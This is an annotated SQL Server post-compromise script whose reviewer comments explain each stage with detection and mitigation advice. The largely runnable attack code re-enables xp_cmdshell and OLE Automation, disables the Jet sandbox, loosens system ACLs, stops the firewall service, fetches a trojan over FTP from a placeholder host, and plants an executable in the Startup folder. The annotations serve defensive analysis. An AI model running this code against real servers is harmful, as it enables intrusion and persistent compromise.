-- Review note: this page is a SQL Server post-compromise script, kept as a sample
-- for analysis. Read top to bottom, it
--   (1) re-creates sp_addextendedproc / sp_dropextendedproc in master,
--   (2) turns on the 'Ad Hoc Distributed Queries' server option,
--   (3) re-registers xp_cmdshell, the sp_OA* OLE Automation procedures and the
--       xp_reg* registry procedures against many DLL names and paths,
--   (4) rewrites the Jet SandBoxMode registry value,
--   (5) runs operating-system commands through Jet shell(), wscript.shell and
--       xp_cmdshell,
--   (6) writes an executable to disk, including the All Users Startup folder,
--   (7) switches the sp_configure options back to 0 at the end.
-- These operations normally require sysadmin-level rights on the instance, so the
-- controls that matter most sit in front of this script: no sysadmin membership
-- for application logins, strong credentials on 'sa', and a low-privileged
-- Windows account for the SQL Server service so that spawned commands inherit
-- little.
use master
go

-- Creates a procedure named sp_addextendedproc in the current database (master,
-- per the "use master" above). It is a thin wrapper that registers an extended
-- stored procedure by handing both arguments to DBCC ADDEXTENDEDPROC.
--   @functname  (owner.)name of the extended procedure to register
--   @dllname    name of the DLL that contains it
-- Returns 1 after raising message 15002 if the caller has an open transaction
-- (@@trancount > 0); otherwise runs the DBCC command and returns 0.
-- NOTE(review): 15002 is presumably the system "cannot be executed within a
-- transaction" message — confirm against sys.messages.
-- NOTE(review): a CREATE PROCEDURE for this name arriving from a client session
-- (rather than from setup or patching) suggests someone is rebuilding the
-- registration path after it was removed as hardening; treat it as an alert.
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
-- Implicit transactions are switched off for the session before the check.
set implicit_transactions off
-- Refuse to run inside a caller's transaction.
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
-- The registration itself: maps @functname to an entry point in @dllname.
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
-- Creates dbo.sp_dropextendedproc: the counterpart wrapper that removes an
-- extended stored procedure registration through DBCC DROPEXTENDEDPROC.
--   @functname  name of the extended procedure to unregister
-- Returns 1 after raising message 15002 if called inside an open transaction,
-- otherwise 0 after the DBCC call.
-- NOTE(review): the message argument reads 'sys.sp_dropextendedproc' although the
-- object is created as dbo.sp_dropextendedproc; the body looks copied from the
-- system procedure's text. Later in this page the wrapper is used to drop
-- xp_cmdshell immediately before re-adding it against a different DLL.
create procedure dbo.sp_dropextendedproc
@functname nvarchar(517) -- name of function
as
-- If we're in a transaction, disallow the dropping of the
-- extended stored procedure.
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
return (1)
end

-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
go
-- Session options, then two server-wide configuration changes.
-- 'show advanced options' is set to 1 so that 'Ad Hoc Distributed Queries' can be
-- set to 1; each change is applied with RECONFIGURE. The second option is what
-- allows the OPENROWSET(...) calls later on this page to name an OLE DB provider
-- ad hoc.
-- Detection: sp_configure changes are written to the SQL Server error log and
-- show up in sys.configurations. The script sets both options back to 0 in its
-- last lines, so a point-in-time configuration review can miss them — alert on
-- the change event, not on the final state.
set ANSI_NULLS   off
set ANSI_WARNINGS   off
go
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'Ad Hoc Distributed Queries', 1
GO
RECONFIGURE
GO

-- Bulk re-registration of extended procedures through the sp_addextendedproc
-- wrapper defined above. Each name is tried against several DLL file names
-- (unsuffixed, "70" and "90" variants), apparently so the script does not need to
-- know which SQL Server release it landed on.
-- Capability groups being restored:
--   xp_cmdshell                               operating-system command execution
--   sp_OACreate / sp_OAMethod / sp_OA*        OLE Automation (COM objects)
--   xp_regread / xp_regwrite / xp_reg*        registry read, write and delete
--   xp_dirtree, xp_fixeddrives,
--   xp_availablemedia, xp_getfiledetails      drive and file-system enumeration
--   xp_enumgroups, xp_loginconfig,
--   xp_enumerrorlogs                          host / instance reconnaissance
-- Detection: on an instance where these were removed, their reappearance in
-- master is a reliable signal (sp_helpextendedproc lists each registered name
-- with its DLL). Baseline that list and diff it on a schedule.
exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'
exec sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb70.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xpweb90.dll'
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'declare @o int
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_dirtree,'xpstar70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar90.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_enumgroups,'xplog90.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar90.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_loginconfig,'xplog90.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar90.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar70.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar90.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole90.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole90.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole90.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole90.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'  
exec sp_addextendedproc sp_OAMethod,'odsole90.dll' 
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole90.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole90.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole90.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar90.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar70.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar90.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar70.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar90.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar70.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar90.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar70.dll'
exec sp_addextendedproc xp_regread,'xpstar90.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar70.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar90.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar70.dll'
exec sp_addextendedproc xp_regwrite,'xpstar90.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar70.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar90.dll'

-- The same registrations issued directly as DBCC ADDEXTENDEDPROC, bypassing the
-- wrapper procedure. Only two capabilities are targeted here: xp_cmdshell
-- (command execution) and sp_oacreate (COM object creation), each against the
-- "70" and "90" DLL names.
-- Detection: DBCC ADDEXTENDEDPROC is rare in normal operations; an audit or trace
-- rule on the statement text is low-noise on most estates.
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
dbcc addextendedproc ("xp_cmdshell","xpweb70.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go

dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go

dbcc addextendedproc ("xp_cmdshell","xplog90.dll")
go
dbcc addextendedproc ("xp_cmdshell","xpweb90.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole90.dll")
go

dbcc addextendedproc ("sp_oacreate","odsole90.dll")
dbcc addextendedproc ("xp_cmdshell","xplog90.dll")
go

dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go


-- "70"-suffixed variants: xp_cmdshell is added, then dropped and re-added against
-- xpsql70.dll and xpweb70.dll, interleaved with sp_OACreate 'ADODB.Stream' calls
-- and further direct DBCC registrations.
-- Detection: a drop of xp_cmdshell followed at once by an add against a different
-- DLL name is a distinctive sequence worth a correlation rule.
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken
go

exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
go

exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
go

EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT


dbcc addextendedproc("xp_cmdshell","xpweb70.dll")
go
dbcc addextendedproc("xp_cmdshell", "xpsql70.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
go
-- xp_cmdshell registration attempts with absolute DLL paths: xplog70/xplog90 and
-- then xpweb70/xpweb90, each under a "...\MSSQL\Binn" directory on drive letters
-- c: through h:. Every attempt is followed by sp_configure 'show advanced
-- options', 0.
-- NOTE(review): the leading ';' and trailing '--' on the sp_configure lines look
-- like fragments lifted from SQL-injection strings (terminate the host statement,
-- comment out the remainder) — an inference from their shape, not something the
-- page states. If so, the same text is useful as a web-tier detection pattern.
-- Detection: sp_helpextendedproc shows the DLL each extended procedure is bound
-- to; any binding with an explicit path, or to a DLL that differs from the
-- instance's baseline, deserves investigation.
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xplog90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","d:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","e:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","f:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","g:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xpweb70.dll")
;EXEC sp_configure   'show advanced options', 0 --
go
dbcc addextendedproc ("xp_cmdshell","h:\Microsoft SQL Server\MSSQL\Binn\xpweb90.dll")
;EXEC sp_configure   'show advanced options', 0 --
go

-- "90"-suffixed repeat of the earlier "70" sequence: add xp_cmdshell, drop and
-- re-add it against xpsql90.dll and xpweb90.dll, create an ADODB.Stream object,
-- then register sp_oacreate and xp_cmdshell directly through DBCC.
-- The same detections apply: audit DBCC ADDEXTENDEDPROC / DROPEXTENDEDPROC and
-- diff the registered extended procedures against a known-good baseline.
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog90.dll'declare @o int
exec sp_addextendedproc 'xp_cmdshell', 'xpsql90.dll'
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken
go

exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell','xpsql90.dll'
go

exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb90.dll'
go

EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT


dbcc addextendedproc("xp_cmdshell","xpweb90.dll")
go
dbcc addextendedproc("xp_cmdshell", "xpsql90.dll")
go
dbcc addextendedproc ("sp_oacreate","odsole90.dll")
dbcc addextendedproc ("xp_cmdshell","xplog90.dll")
go
-- Registry tampering followed by command execution through the Jet provider.
--  * xp_regwrite sets SandBoxMode (REG_DWORD) under the Jet 4.0 Engines key.
--    Jet documents values 2 and 3 as keeping the expression sandbox on for
--    non-Access hosts; 0 and 1 leave it off, which is what lets shell() be
--    evaluated in the OPENROWSET queries below.
--  * xp_regdeletekey removes the Image File Execution Options subkeys for ftp.exe
--    and cmd.exe — presumably to undo a per-binary block that an administrator
--    placed there; confirm against the host's hardening baseline.
--  * Each OpenRowSet call opens ias\dnary.mdb with Microsoft.Jet.OLEDB.4.0 and
--    passes a query whose only purpose is shell("..."). The commands reset or
--    widen ACLs (icacls /reset, cacls granting SYSTEM full control) on cmd.exe,
--    ftp.exe, cacls.exe and net1.exe, then stop the "alg" service.
-- Detection: registry writes to ...\Jet\4.0\Engines\SandBoxMode and deletions
-- under Image File Execution Options made by the SQL Server service account;
-- sqlservr.exe as parent of icacls/cacls/net1.
-- Mitigation: keep 'Ad Hoc Distributed Queries' at 0 and SandBoxMode at a value
-- that keeps the sandbox on for non-Access programs.
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe'
exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe'
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls cmd.exe  /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls ftp.exe  /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls cacls.exe  /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls cacls.exe  /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("icacls net1.exe  /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls cmd.exe  /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\icacls ftp.exe  /reset")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls cmd.exe /e  /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls ftp.exe /e  /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\cacls cmd.exe /e  /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("dllcache\cacls ftp.exe /e  /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("cacls net1.exe /e  /g system::f")')
go
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=ias\dnary.mdb','select shell("net1 stop alg")')
go
-- The same ACL and service commands, this time through OLE Automation: each batch
-- creates a wscript.shell object with sp_oacreate and calls its run method with
-- sp_oamethod. The final statement repeats "net1 stop alg" through the Jet
-- provider.
-- The script issues every command by more than one route (Jet shell(),
-- wscript.shell, and later xp_cmdshell), so closing a single route is not enough.
-- Mitigation: keep the 'Ole Automation Procedures' server option disabled and do
-- not grant EXECUTE on the sp_OA* procedures to non-administrative principals.
-- Detection: child processes of sqlservr.exe; a database engine launching
-- icacls, cacls or net1 has no routine explanation.
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [net1 stop alg]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls cmd.exe  /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls ftp.exe  /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls cacls.exe  /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [icacls net1.exe  /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\icacls cmd.exe  /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\icacls ftp.exe  /reset]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls cmd.exe /e  /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls ftp.exe /e  /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\cacls cmd.exe /e  /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [dllcache\cacls ftp.exe /e  /g system::f]
go
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run], NULL, [cacls net1.exe /e  /g system::f]
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\dnary.mdb','select shell("net1 stop alg")')
go
-- Download-and-run stage, issued twice: once through wscript.shell and once
-- through Jet shell() after SandBoxMode is written again.
-- The command line stops the "sharedaccess" service, echoes an FTP command script
-- into cmd.txt, runs "ftp -s:cmd.txt", starts the fetched file, and deletes
-- cmd.txt. The FTP host, account, password and file name on this page are Chinese
-- placeholder words (address / account / password / "trojan".exe), not real
-- values — there are no network indicators to extract from this sample.
-- Detection: ftp.exe started with -s: by cmd.exe under sqlservr.exe; a short-lived
-- cmd.txt in the service's working directory; service-stop events for
-- sharedaccess or alg on a database host.
-- Mitigation: deny outbound FTP (and general internet egress) from database
-- servers at the network layer, independent of the host firewall this line
-- tries to stop.
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open FTP地址> cmd.txt&echo 账户>> cmd.txt&echo 密码>> cmd.txt&echo binary >> cmd.txt&echo get 木马.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&木马.exe&木马.exe&del cmd.txt /q /f&exit'--
go

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open FTP地址> cmd.txt&echo 账户>> cmd.txt&echo 密码>> cmd.txt&echo binary >> cmd.txt&echo get 木马.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&木马.exe&木马.exe&del cmd.txt /q /f&exit")')
go
-- Conditional re-registration plus renamed copies of system binaries.
--  * The "if not exists" line registers sp_OACreate, sp_OASetProperty,
--    sp_OADestroy and sp_OAMethod from odsole70.dll only when dbo.sysobjects has
--    no such object.
--  * scripting.filesystemobject copyfile then copies ftp.exe to p.exe and
--    cacls.exe to cs.exe inside c:\windows\system32 (sources taken from both
--    system32 and system32\dllcache).
--  * cs.exe — the cacls copy — is run to grant SYSTEM full control on cmd.exe,
--    net1.exe and msado15.dll.
--  * SandBoxMode is written once more at the end.
-- Detection: the renamed copies defeat rules keyed on process name. Match on file
-- hash or the binary's embedded original file name instead, and alert on new
-- executables appearing in system32 that were written by the SQL Server service
-- account.
exec sp_configure 'show advanced options', 1;
if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';
declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';
declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\net1.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

go
-- File-drop stage using an ADODB.Stream COM object: the stream is set to Type 1
-- (binary), opened, written once, and saved to four locations with save option 2
-- (overwrite if the file exists), then closed and destroyed.
-- The argument to 'Write' on this page is a Chinese placeholder comment where a
-- hex literal would go, not an actual payload, so there is no file hash to derive
-- from this sample.
-- Targets: 'mppsql.exe' (relative path), C:\dx.exe, and mssql.exe in the All
-- Users Startup folder under both its English short-name path and its
-- Chinese-localised path. The Startup copies give persistence across logons.
-- Detection: executable files created by sqlservr.exe anywhere on disk; any new
-- file in an All Users Startup folder on a server; the file names mppsql.exe,
-- dx.exe and mssql.exe at these paths as sample-specific indicators.
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL,0x16进制马儿!!!!!在这里啊!煞B
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'mppsql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'C:\dx.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'C:\Docume~1\alluse~1\Start~1\Programs\Startup\mssql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'c:\docume~1\alluse~1\「开始」菜单\程序\启动\mssql.exe', 2
EXEC sp_OAMethod @ObjectToken, 'Close'
EXEC sp_OADestroy @ObjectToken
go
-- Execution of the dropped mppsql.exe, attempted by every route the script has
-- set up: wscript.shell 'run', Jet shell() through OPENROWSET, and xp_cmdshell,
-- each with bare, c:\windows\system32 and c:\winnt\system32 path variants.
-- The xp_regwrite calls in this block write SandBoxMode again; the key strings
-- and value forms differ slightly from line to line, so registry detections
-- should match on the value name SandBoxMode under the Jet 4.0 branch rather than
-- on one exact path.
-- Detection: process creation where the parent is sqlservr.exe (directly, or via
-- cmd.exe) and the image is outside the instance's own binaries.
-- Mitigation: the 'xp_cmdshell' server option off, 'Ole Automation Procedures'
-- off, 'Ad Hoc Distributed Queries' off — all three are needed to close the
-- routes used here.
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'mppsql.exe'--
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\windows\system32\mppsql.exe'-- 
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\windows\system32\cmd.exe/c mppsql.exe'--
go
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'c:\winnt\system32\cmd.exe/c mppsql.exe'--  
go
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("mppsql.exe")')
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0 \Engine','SandBoxMode','REG_DWORD','0'
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\mppsql.exe")');
go
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0 \Engine','SandBoxMode','REG_DWORD','0'
